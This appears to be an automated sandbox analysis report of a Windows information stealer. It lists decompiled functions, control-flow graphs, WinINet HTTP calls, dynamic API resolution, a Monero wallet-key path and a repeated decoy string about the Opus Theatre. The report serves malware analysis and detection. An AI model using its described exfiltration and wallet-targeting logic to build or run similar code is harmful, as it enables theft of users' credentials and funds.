                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45DD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4729
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B45D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B4770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003B46CD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: ac6fd1e3f900717749ed5f9a575060b7adabffd2454d19313c9bee99136d53e3
                            • Instruction ID: 7448159b976cff37eb024b5a63660f7f6f7fd82fa56f9ee32fd34a0a94ef0172
                            • Opcode Fuzzy Hash: ac6fd1e3f900717749ed5f9a575060b7adabffd2454d19313c9bee99136d53e3
                            • Instruction Fuzzy Hash: 9141E361AC6788EAF636FBE4EC42EDD7B565F8270DB507042EA2092383DFB066084535
                            Function 003B4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 801 3b4880-3b4942 call 3ca7a0 call 3b47b0 call 3ca740 * 5 InternetOpenA StrCmpCA 816 3b494b-3b494f 801->816 817 3b4944 801->817 818 3b4ecb-3b4ef3 InternetCloseHandle call 3caad0 call 3b9ac0 816->818 819 3b4955-3b4acd call 3c8b60 call 3ca920 call 3ca8a0 call 3ca800 * 2 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca920 call 3ca8a0 call 3ca800 * 2 InternetConnectA 816->819 817->816 829 3b4f32-3b4fa2 call 3c8990 * 2 call 3ca7a0 call 3ca800 * 8 818->829 830 3b4ef5-3b4f2d call 3ca820 call 3ca9b0 call 3ca8a0 call 3ca800 818->830 819->818 905 3b4ad3-3b4ad7 819->905 830->829 906 3b4ad9-3b4ae3 905->906 907 3b4ae5 905->907 908 3b4aef-3b4b22 HttpOpenRequestA 906->908 907->908 909 3b4b28-3b4e28 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca9b0 call 3ca8a0 call 3ca800 call 3ca920 call 3ca8a0 call 3ca800 call 3ca740 call 3ca920 * 2 call 3ca8a0 call 3ca800 * 2 call 3caad0 lstrlen call 3caad0 * 2 lstrlen call 3caad0 HttpSendRequestA 908->909 910 3b4ebe-3b4ec5 InternetCloseHandle 908->910 1021 3b4e32-3b4e5c InternetReadFile 909->1021 910->818 1022 3b4e5e-3b4e65 1021->1022 1023 3b4e67-3b4eb9 InternetCloseHandle call 3ca800 1021->1023 1022->1023 1024 3b4e69-3b4ea7 call 3ca9b0 call 3ca8a0 call 3ca800 1022->1024 1023->910 1024->1021
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                              • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003B4915
                            • StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B4ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003D0DDB,00000000,?,?,00000000,?,",00000000,?,0108E7F8), ref: 003B4DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003B4E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003B4E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003B4E49
                            • InternetCloseHandle.WININET(00000000), ref: 003B4EAD
                            • InternetCloseHandle.WININET(00000000), ref: 003B4EC5
                            • HttpOpenRequestA.WININET(00000000,0108E8C8,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B4B15
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • InternetCloseHandle.WININET(00000000), ref: 003B4ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                            • Instruction ID: 7ebfaae00544dc2345e76b75334c3623c4bd0da190f15601e017a699477cb5ee
                            • Opcode Fuzzy Hash: 856d785b31be2e36e76b5411654a961868609abc9e9b2e6413d68e78af28fd16
                            • Instruction Fuzzy Hash: 6712C87291061CABDB16EB90DC92FEEB778AF14304F50419DB106AA091EF702F49CF66
                            Function 003C7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                            • Instruction ID: 5cf26d08c785ec9b0d3d326c4a9f0f4e1ed096289aa6da4abb3ce0d5ff52cb54
                            • Opcode Fuzzy Hash: a2ef45f579205ebc44356beb9632b0228bca343b8554d58bc8d77750bbd32b48
                            • Instruction Fuzzy Hash: B7F044F1944208AFC700DF95DD45FAEBBB8F704751F100159FA05E3680C7781904CBA2
                            Function 003B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                            • Instruction ID: 767420209e0aeff40f29aeb1bc64090218ba4525e7fb29b236cd7ba78641afad
                            • Opcode Fuzzy Hash: 827c0bc94a7126e645342d1d33665dafc2280d979fe4a28901c4ff6c3f9427e4
                            • Instruction Fuzzy Hash: DED05EB490130CDBCB00EFE0D849AEDBB78FB08315F000554D909B2340EA346486CAA6
                            Function 003C9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 3c9c10-3c9c1a 634 3ca036-3ca0ca LoadLibraryA * 8 633->634 635 3c9c20-3ca031 GetProcAddress * 43 633->635 636 3ca0cc-3ca141 GetProcAddress * 5 634->636 637 3ca146-3ca14d 634->637 635->634 636->637 638 3ca216-3ca21d 637->638 639 3ca153-3ca211 GetProcAddress * 8 637->639 640 3ca21f-3ca293 GetProcAddress * 5 638->640 641 3ca298-3ca29f 638->641 639->638 640->641 642 3ca2a5-3ca332 GetProcAddress * 6 641->642 643 3ca337-3ca33e 641->643 642->643 644 3ca41f-3ca426 643->644 645 3ca344-3ca41a GetProcAddress * 9 643->645 646 3ca428-3ca49d GetProcAddress * 5 644->646 647 3ca4a2-3ca4a9 644->647 645->644 646->647 648 3ca4dc-3ca4e3 647->648 649 3ca4ab-3ca4d7 GetProcAddress * 2 647->649 650 3ca515-3ca51c 648->650 651 3ca4e5-3ca510 GetProcAddress * 2 648->651 649->648 652 3ca612-3ca619 650->652 653 3ca522-3ca60d GetProcAddress * 10 650->653 651->650 654 3ca67d-3ca684 652->654 655 3ca61b-3ca678 GetProcAddress * 4 652->655 653->652 656 3ca69e-3ca6a5 654->656 657 3ca686-3ca699 GetProcAddress 654->657 655->654 658 3ca708-3ca709 656->658 659 3ca6a7-3ca703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01075750), ref: 003C9C2D
                            • GetProcAddress.KERNEL32(74DD0000,01075A70), ref: 003C9C45
                            • GetProcAddress.KERNEL32(74DD0000,01089670), ref: 003C9C5E
                            • GetProcAddress.KERNEL32(74DD0000,010896D0), ref: 003C9C76
                            • GetProcAddress.KERNEL32(74DD0000,01089610), ref: 003C9C8E
                            • GetProcAddress.KERNEL32(74DD0000,01089640), ref: 003C9CA7
                            • GetProcAddress.KERNEL32(74DD0000,0107B748), ref: 003C9CBF
                            • GetProcAddress.KERNEL32(74DD0000,0108CF00), ref: 003C9CD7
                            • GetProcAddress.KERNEL32(74DD0000,0108D0B0), ref: 003C9CF0
                            • GetProcAddress.KERNEL32(74DD0000,0108CE88), ref: 003C9D08
                            • GetProcAddress.KERNEL32(74DD0000,0108D068), ref: 003C9D20
                            • GetProcAddress.KERNEL32(74DD0000,010758D0), ref: 003C9D39
                            • GetProcAddress.KERNEL32(74DD0000,01075A30), ref: 003C9D51
                            • GetProcAddress.KERNEL32(74DD0000,010756F0), ref: 003C9D69
                            • GetProcAddress.KERNEL32(74DD0000,01075710), ref: 003C9D82
                            • GetProcAddress.KERNEL32(74DD0000,0108D0C8), ref: 003C9D9A
                            • GetProcAddress.KERNEL32(74DD0000,0108CF18), ref: 003C9DB2
                            • GetProcAddress.KERNEL32(74DD0000,0107B7C0), ref: 003C9DCB
                            • GetProcAddress.KERNEL32(74DD0000,010758F0), ref: 003C9DE3
                            • GetProcAddress.KERNEL32(74DD0000,0108CE10), ref: 003C9DFB
                            • GetProcAddress.KERNEL32(74DD0000,0108CFD8), ref: 003C9E14
                            • GetProcAddress.KERNEL32(74DD0000,0108CFF0), ref: 003C9E2C
                            • GetProcAddress.KERNEL32(74DD0000,0108CEA0), ref: 003C9E44
                            • GetProcAddress.KERNEL32(74DD0000,01075990), ref: 003C9E5D
                            • GetProcAddress.KERNEL32(74DD0000,0108CED0), ref: 003C9E75
                            • GetProcAddress.KERNEL32(74DD0000,0108CEB8), ref: 003C9E8D
                            • GetProcAddress.KERNEL32(74DD0000,0108D008), ref: 003C9EA6
                            • GetProcAddress.KERNEL32(74DD0000,0108CF30), ref: 003C9EBE
                            • GetProcAddress.KERNEL32(74DD0000,0108D020), ref: 003C9ED6
                            • GetProcAddress.KERNEL32(74DD0000,0108CF48), ref: 003C9EEF
                            • GetProcAddress.KERNEL32(74DD0000,0108D038), ref: 003C9F07
                            • GetProcAddress.KERNEL32(74DD0000,0108CFA8), ref: 003C9F1F
                            • GetProcAddress.KERNEL32(74DD0000,0108D050), ref: 003C9F38
                            • GetProcAddress.KERNEL32(74DD0000,0108A690), ref: 003C9F50
                            • GetProcAddress.KERNEL32(74DD0000,0108D080), ref: 003C9F68
                            • GetProcAddress.KERNEL32(74DD0000,0108CE28), ref: 003C9F81
                            • GetProcAddress.KERNEL32(74DD0000,01075910), ref: 003C9F99
                            • GetProcAddress.KERNEL32(74DD0000,0108D0E0), ref: 003C9FB1
                            • GetProcAddress.KERNEL32(74DD0000,01075730), ref: 003C9FCA
                            • GetProcAddress.KERNEL32(74DD0000,0108D098), ref: 003C9FE2
                            • GetProcAddress.KERNEL32(74DD0000,0108CE58), ref: 003C9FFA
                            • GetProcAddress.KERNEL32(74DD0000,01075930), ref: 003CA013
                            • GetProcAddress.KERNEL32(74DD0000,01075D30), ref: 003CA02B
                            • LoadLibraryA.KERNEL32(0108CF60,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA03D
                            • LoadLibraryA.KERNEL32(0108CDF8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA04E
                            • LoadLibraryA.KERNEL32(0108CFC0,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA060
                            • LoadLibraryA.KERNEL32(0108CE40,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA072
                            • LoadLibraryA.KERNEL32(0108CF90,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA083
                            • LoadLibraryA.KERNEL32(0108CE70,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA095
                            • LoadLibraryA.KERNEL32(0108CF78,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0A7
                            • LoadLibraryA.KERNEL32(0108CEE8,?,003C5CA3,003D0AEB,?,?,?,?,?,?,?,?,?,?,003D0AEA,003D0AE3), ref: 003CA0B8
                            • GetProcAddress.KERNEL32(75290000,01075C30), ref: 003CA0DA
                            • GetProcAddress.KERNEL32(75290000,0108D158), ref: 003CA0F2
                            • GetProcAddress.KERNEL32(75290000,010891A8), ref: 003CA10A
                            • GetProcAddress.KERNEL32(75290000,0108D2C0), ref: 003CA123
                            • GetProcAddress.KERNEL32(75290000,01075B50), ref: 003CA13B
                            • GetProcAddress.KERNEL32(73480000,0107B5E0), ref: 003CA160
                            • GetProcAddress.KERNEL32(73480000,01075D50), ref: 003CA179
                            • GetProcAddress.KERNEL32(73480000,0107BA68), ref: 003CA191
                            • GetProcAddress.KERNEL32(73480000,0108D2F0), ref: 003CA1A9
                            • GetProcAddress.KERNEL32(73480000,0108D380), ref: 003CA1C2
                            • GetProcAddress.KERNEL32(73480000,01075B90), ref: 003CA1DA
                            • GetProcAddress.KERNEL32(73480000,01075CB0), ref: 003CA1F2
                            • GetProcAddress.KERNEL32(73480000,0108D338), ref: 003CA20B
                            • GetProcAddress.KERNEL32(752C0000,01075C90), ref: 003CA22C
                            • GetProcAddress.KERNEL32(752C0000,01075B10), ref: 003CA244
                            • GetProcAddress.KERNEL32(752C0000,0108D1B8), ref: 003CA25D
                            • GetProcAddress.KERNEL32(752C0000,0108D290), ref: 003CA275
                            • GetProcAddress.KERNEL32(752C0000,01075E50), ref: 003CA28D
